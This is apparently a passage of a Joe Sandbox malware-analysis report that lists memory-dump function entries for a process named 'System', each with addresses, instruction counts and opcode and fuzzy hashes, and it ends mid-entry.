                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2949039dfff36d7c983ae21777b5accd6872c0d91b4ba2a35aa45b0931672611
                                                                                                      • Instruction ID: 168218df071f0ab93df7106a0674a91385cd90c5f59b0a1ef252bf4e76b9bac1
                                                                                                      • Opcode Fuzzy Hash: 2949039dfff36d7c983ae21777b5accd6872c0d91b4ba2a35aa45b0931672611
                                                                                                      • Instruction Fuzzy Hash: 54014C30909A8C8FCF55EF18C8A9AD97FF0FF69300F0502AAE408C71A1DB359954CB81
                                                                                                      Function 00007FFD9B8E5550 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9bc5d17c1ab0c3abcc278f77eddfdd7a9d5a813d5e22c646511e178f9b45cb55
                                                                                                      • Instruction ID: e1032dc25f7808b186e13570db42bff82ef47e375148cc43ce4c167eeaa7df77
                                                                                                      • Opcode Fuzzy Hash: 9bc5d17c1ab0c3abcc278f77eddfdd7a9d5a813d5e22c646511e178f9b45cb55
                                                                                                      • Instruction Fuzzy Hash: 4801E870914A4D8FDF84EF68C848AEE7BF0FB28305F00056AA81DD3264DB30E590CB81
                                                                                                      Function 00007FFD9B8E5470 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b1b39640192212ce1adb18c342e3f999d700bd43441689b64641cde26a842d8c
                                                                                                      • Instruction ID: 132893145a604c026f9dcd9879c9e1a36c68259578832ae98a6cc8fc7bec32f3
                                                                                                      • Opcode Fuzzy Hash: b1b39640192212ce1adb18c342e3f999d700bd43441689b64641cde26a842d8c
                                                                                                      • Instruction Fuzzy Hash: CD01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3264DB71E594CB81
                                                                                                      Function 00007FFD9B8E2CB0 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6cddde8ba854cde21fcb19b02736164d1cfe1cc6868e3c22c4955f41e55d368e
                                                                                                      • Instruction ID: 7fccd4796b244c30aea5a32d3ab58b2df0b10de671b764742e0fd95f990e2d17
                                                                                                      • Opcode Fuzzy Hash: 6cddde8ba854cde21fcb19b02736164d1cfe1cc6868e3c22c4955f41e55d368e
                                                                                                      • Instruction Fuzzy Hash: C201A42094F3C95FEB53ABB488745D47FF0AF0B204F0945EBD488CA0A7D5284589C312
                                                                                                      Function 00007FFD9B8B1A98 Relevance: .0, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b47dbd88e8b23dba16f549e93ff0ab573ce216fbeb66fb30122874be39f3fc03
                                                                                                      • Instruction ID: 63def765d5e06d4c4942f40ae41f9491be0a33105c0035a663f38ef5dcefd9d5
                                                                                                      • Opcode Fuzzy Hash: b47dbd88e8b23dba16f549e93ff0ab573ce216fbeb66fb30122874be39f3fc03
                                                                                                      • Instruction Fuzzy Hash: 18019A70914A4D9FDF84EF58C859AFE77F0FB68305F10056AA81DD32A0DB34A595CB81
                                                                                                      Function 00007FFD9B8A84D5 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6e35d7efe0abf73895ee435d7e322f5e5e6c04cd09b1931f12c44f1749b87224
                                                                                                      • Instruction ID: 409661c27e59ffe11beece85d139afa3366ec7b1afb27ade72ca8650b966a640
                                                                                                      • Opcode Fuzzy Hash: 6e35d7efe0abf73895ee435d7e322f5e5e6c04cd09b1931f12c44f1749b87224
                                                                                                      • Instruction Fuzzy Hash: 5B01AD7091978D8FDB54DF18C8555E93BE1FF28314F4501AAE848C3291D738E654CB92
                                                                                                      Function 00007FFD9B8E1F09 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8c139bef4349638deeab95514b7054a69b69fe1e54dd06bda1bcf0d1c9fba0ac
                                                                                                      • Instruction ID: 75fc0ca69c41ed24e61430bed8221c46a18d2f90ce8b9e89579502938ae24f7d
                                                                                                      • Opcode Fuzzy Hash: 8c139bef4349638deeab95514b7054a69b69fe1e54dd06bda1bcf0d1c9fba0ac
                                                                                                      • Instruction Fuzzy Hash: 0901623090968D8FCB89EF64C865AD97FF0FF69300F0541DAD409CB1A2DB759994CB81
                                                                                                      Function 00007FFD9B8E9CF9 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 15b5487acce2fd89aa5ed8a35a8693fa02da6792c26ec9d542962a9600002315
                                                                                                      • Instruction ID: 82cb7b4d3f1f16b6446101f1e43b375d2ddb959fa40768d649ac24329ab84e72
                                                                                                      • Opcode Fuzzy Hash: 15b5487acce2fd89aa5ed8a35a8693fa02da6792c26ec9d542962a9600002315
                                                                                                      • Instruction Fuzzy Hash: E7012C70A0968C8FDB56DF68C869AA97FB0FF59300F0505EAD408C71A2D6759994CB41
                                                                                                      Function 00007FFD9B8DA3B9 Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3aa990b70cd6ca8100a4e0f0a9eb2d32d5976d5a0f726e9f392df8a3f871fb76
                                                                                                      • Instruction ID: b386fcfb00adad59362db2247213f372065e3e1f0a2e01499e08e5c8bad6619b
                                                                                                      • Opcode Fuzzy Hash: 3aa990b70cd6ca8100a4e0f0a9eb2d32d5976d5a0f726e9f392df8a3f871fb76
                                                                                                      • Instruction Fuzzy Hash: A5012C3090968C9FCB85EF64C868AAA7FB1FF69301F1501DBD449C71A2DB359994CB41
                                                                                                      Function 00007FFD9B8E3B09 Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 606b496d88f8ee6d91ccd50091973d7f92a880e6d0ef0b65dd8409be6b36a77d
                                                                                                      • Instruction ID: b9ee591ac65f1aa549d9160a9e29edd0b2512d0be92ba7113aa9c7f8f139996c
                                                                                                      • Opcode Fuzzy Hash: 606b496d88f8ee6d91ccd50091973d7f92a880e6d0ef0b65dd8409be6b36a77d
                                                                                                      • Instruction Fuzzy Hash: EC016D31A0968D8FDB86EF68C8546ED7BF0FF59300F0505AAD419C72A2DB349A44CB41
                                                                                                      Function 00007FFD9B8E9C39 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab5cd54f6cf5b9bdf9bbda1a28374941bac4b1e41ee636696a422e438d9d81e0
                                                                                                      • Instruction ID: 858aa09fb54ad924c646615c8ad17d2f53b5b2c96108342b0e224e5aed2f65b2
                                                                                                      • Opcode Fuzzy Hash: ab5cd54f6cf5b9bdf9bbda1a28374941bac4b1e41ee636696a422e438d9d81e0
                                                                                                      • Instruction Fuzzy Hash: 5A014F3090968D8FCB99EF64C869A9D7FF0FF59301F0500EAD409C71A2D7759994CB41
                                                                                                      Function 00007FFD9B8E5AA9 Relevance: .0, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8ce00685986fc58af7fc2ce6891ddb27a6fba0db89159ccf786d4fe064aaeb9c
                                                                                                      • Instruction ID: fd98bfd6f865ced06215a546dd559d4c6b73ce297fb302b1d8f4df8ff13966e1
                                                                                                      • Opcode Fuzzy Hash: 8ce00685986fc58af7fc2ce6891ddb27a6fba0db89159ccf786d4fe064aaeb9c
                                                                                                      • Instruction Fuzzy Hash: F001AD71A0E3C98FEB65AF648CA56E87FB0FF15200F0901FBD558C60E7DA3895848702
                                                                                                      Function 00007FFD9B8DC9E0 Relevance: .0, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67342eb0dd545f8e2384f86cf1b416b883e0fb612ff699d3704da81f192b98c9
                                                                                                      • Instruction ID: edad0675d02f9d16678f8c30716f2cf65349be69f2ddaf51d1b59ba230089d73
                                                                                                      • Opcode Fuzzy Hash: 67342eb0dd545f8e2384f86cf1b416b883e0fb612ff699d3704da81f192b98c9
                                                                                                      • Instruction Fuzzy Hash: 2CF0C970914A4D9FCF44EF58C859AE97BF0FB68305F00456AE80DD3250DB30A594CB81
                                                                                                      Function 00007FFD9B8A7CED Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 993ce647e5972922737dd9a236b7aef217181913f8f9fce7ad10d5d611271843
                                                                                                      • Instruction ID: 290a7cc835bf5912b190227169072b3c2c2ccc0c3f907839ef93ac73e373021f
                                                                                                      • Opcode Fuzzy Hash: 993ce647e5972922737dd9a236b7aef217181913f8f9fce7ad10d5d611271843
                                                                                                      • Instruction Fuzzy Hash: E7F0903450964D8FCB95DF58C891ADA3FE0FF29340F0101A5E418C71A5D774E965CB81
                                                                                                      Function 00007FFD9B8DA3D0 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f730cddd698a940eac6ce799201feffead9cd9f348a1563526adfb63ac7f83cf
                                                                                                      • Instruction ID: 2659516c80ca46fcf840922cd6335eb0ab2f28b1c66b9a7d26883f9e111bae05
                                                                                                      • Opcode Fuzzy Hash: f730cddd698a940eac6ce799201feffead9cd9f348a1563526adfb63ac7f83cf
                                                                                                      • Instruction Fuzzy Hash: F3F0A93091494D9FDF85EF58C458AAA7BE1FB68305F10419AA41DD3164DB3196A4CB81
                                                                                                      Function 00007FFD9B8E1230 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b68a1324ad5a5ce55747add37195a61ac64d82ac2c731aa301313a6d2e398356
                                                                                                      • Instruction ID: 35bbad5bbd6fba0b4453671be619b17fa677bafc5046074d1e812e941ed2f09e
                                                                                                      • Opcode Fuzzy Hash: b68a1324ad5a5ce55747add37195a61ac64d82ac2c731aa301313a6d2e398356
                                                                                                      • Instruction Fuzzy Hash: A0F0F93090490D9FCB88EF54C454AEA7BA0FB58305F1000AAE41DD7264CB31AA90CB80
                                                                                                      Function 00007FFD9B8E6D38 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3265ccda03740ba165a357ed2b6e017886a1db76cfa1c8d114d63cab6e18e0cd
                                                                                                      • Instruction ID: e879e9939a3d8afc58de0a79ffb93d5de96cf4ec740a6a9fa1f094d2fd0b24cf
                                                                                                      • Opcode Fuzzy Hash: 3265ccda03740ba165a357ed2b6e017886a1db76cfa1c8d114d63cab6e18e0cd
                                                                                                      • Instruction Fuzzy Hash: BFF0F93090494D9FCB98EF54C458AAE7BE0FF68304F1004AAE41DD3260CB71A690CB80
                                                                                                      Function 00007FFD9B8A74CD Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: be13185b5327c2cfd6a01c4d99874cec7ba804a74e571e848fbe96bf9f35d9d1
                                                                                                      • Instruction ID: 91cfe130cd19f000ebbe89a8f4dac2a00602069dd578ed784c64e247e15ed7bf
                                                                                                      • Opcode Fuzzy Hash: be13185b5327c2cfd6a01c4d99874cec7ba804a74e571e848fbe96bf9f35d9d1
                                                                                                      • Instruction Fuzzy Hash: 49F06D3550968DCFCB95DF18C8556993BE0FF59310F0501A6E41CC7166D774D964CB81
                                                                                                      Function 00007FFD9B8E1F85 Relevance: .0, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 191bb325bb2a913eb7ae4f0af0e362fb8e0e7fb8943802657d0b7d46df29624e
                                                                                                      • Instruction ID: e0174b30cd73a1046d75d2a30ed67ee1efe54710f25cf8324d483c540cf4bf0f
                                                                                                      • Opcode Fuzzy Hash: 191bb325bb2a913eb7ae4f0af0e362fb8e0e7fb8943802657d0b7d46df29624e
                                                                                                      • Instruction Fuzzy Hash: 6AF0EC35A0E54C9FDB16EF94CC708E87F21EF56305B1641A1D40DCB172CA35AD02C780
                                                                                                      Function 00007FFD9B8998F1 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B896000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B896000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b896000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2755c16ec20f41fe40a316512840331512b982b14744bd8240b62bc01847b4ea
                                                                                                      • Instruction ID: 6eba4cde3f26e6e806468d3fea7bf3a342a89a3ced0f32bccd9533460ec11ff6
                                                                                                      • Opcode Fuzzy Hash: 2755c16ec20f41fe40a316512840331512b982b14744bd8240b62bc01847b4ea
                                                                                                      • Instruction Fuzzy Hash: 5BF03071E0D51D8EDBE5DB1C88686A9A7E1EF5C311F1142FAD01DD2292DE342AC14F01
                                                                                                      Function 00007FFD9B8A7325 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2cfc3a7b733ecfa26f7c4fe965e52f69aa440e73078b3b4e353da9c351d15b95
                                                                                                      • Instruction ID: f88948cfbad4594ba3a7f5d29056d8bc2707eb500a13a5b222b496bcfb6a5366
                                                                                                      • Opcode Fuzzy Hash: 2cfc3a7b733ecfa26f7c4fe965e52f69aa440e73078b3b4e353da9c351d15b95
                                                                                                      • Instruction Fuzzy Hash: 82F0A77590D68D9FDB61AB64845D2DC7FF0FF15300F4504ABD408C6051D6349294D701
                                                                                                      Function 00007FFD9B8B0C41 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction ID: 2236270f766b404bb97735bd3144ba7f8818f5dccf9064b51ea13e9e23b1db24
                                                                                                      • Opcode Fuzzy Hash: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction Fuzzy Hash: 4BF0CD70E1926E8EEB64CFE684642AD77B1BF5C700F114536D41D561A6CB386A41DF40
                                                                                                      Function 00007FFD9B890CD7 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03ae4ff55aa787ed8873e27ee002dfbd0012796c1baebd836331f96d83155399
                                                                                                      • Instruction ID: 265d20d81750986265ce3abc996874ab48f370d1df73b72f891973469574bacb
                                                                                                      • Opcode Fuzzy Hash: 03ae4ff55aa787ed8873e27ee002dfbd0012796c1baebd836331f96d83155399
                                                                                                      • Instruction Fuzzy Hash: 1EF0C270A0D11A8BEB14DB84C8947F97BB1FF54305F044A3AC425872D2CB786680CB80
                                                                                                      Function 00007FFD9B89E68D Relevance: .0, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab754a36c0b8ef76ade9dae1ad11c6bad2a77e3dc3923b0f49f748857864b744
                                                                                                      • Instruction ID: ea31ba4005094a8fdde5766cd7c0452ad030c10ce67695f3fed31aa2bca88462
                                                                                                      • Opcode Fuzzy Hash: ab754a36c0b8ef76ade9dae1ad11c6bad2a77e3dc3923b0f49f748857864b744
                                                                                                      • Instruction Fuzzy Hash: 6FF0823181E38D8FDF669F24C9655D97FA0FF45300F4501F6E818C61A2DB349554C741
                                                                                                      Function 00007FFD9B8973E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B896000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B896000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b896000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 99a1b234c08f5143dcc75a673ab5469febbdac9bff146562c9b158fdd3e61d5c
                                                                                                      • Instruction ID: 366f1125a1083300f404b41c1beabdd5241de96ac91596e9fa8487ddce26a593
                                                                                                      • Opcode Fuzzy Hash: 99a1b234c08f5143dcc75a673ab5469febbdac9bff146562c9b158fdd3e61d5c
                                                                                                      • Instruction Fuzzy Hash: C7F0FE70E0991D8AEBA4EB18DC656E97AA1EF84345F1041F6900EDA2D6DE342EC24F41
                                                                                                      Function 00007FFD9B89E8D5 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9e91ab1a3d8cc560ffc7ecc63e0e11d2c099a3ffc24025c52d0581921c500c04
                                                                                                      • Instruction ID: 7280d7c3df9d00c93e02f926697595f3901a82321df49a66352cc7c55827e08d
                                                                                                      • Opcode Fuzzy Hash: 9e91ab1a3d8cc560ffc7ecc63e0e11d2c099a3ffc24025c52d0581921c500c04
                                                                                                      • Instruction Fuzzy Hash: BCE0D83284F28D4BE721675089751E43F50FF06300F4601BAE04C860E2DA28555CC702
                                                                                                      Function 00007FFD9B8AFF31 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8c0cf3644b8d59f491e2f7122078d551f5e5c3f32535519750ab9faa9039ffec
                                                                                                      • Instruction ID: d22b082633dd42d15c11eac5f4a5e284c4295e7f1942939dd70806572af9773a
                                                                                                      • Opcode Fuzzy Hash: 8c0cf3644b8d59f491e2f7122078d551f5e5c3f32535519750ab9faa9039ffec
                                                                                                      • Instruction Fuzzy Hash: 20D0C261F0494F46EB289B84C821ABD2BA2EF14384F410134D42AEA1D9DF2828434740
                                                                                                      Function 00007FFD9B8A6047 Relevance: .0, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: eb2f8d69e71298ae7768a5ac284c554ba65e54df7ddc4e1c0db2075fb8973d81
                                                                                                      • Instruction ID: 031591ee34833968120a0a0c9e9feb1dd2effdc6e9e6d041cb7c1d8eb68a297a
                                                                                                      • Opcode Fuzzy Hash: eb2f8d69e71298ae7768a5ac284c554ba65e54df7ddc4e1c0db2075fb8973d81
                                                                                                      • Instruction Fuzzy Hash: AED0EC60D09A998BDBA5DB5488747ACA6A4FB18700F0102A9A05DD2282DB341AC08B01
                                                                                                      Function 00007FFD9B8E60E9 Relevance: .0, Instructions: 13COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
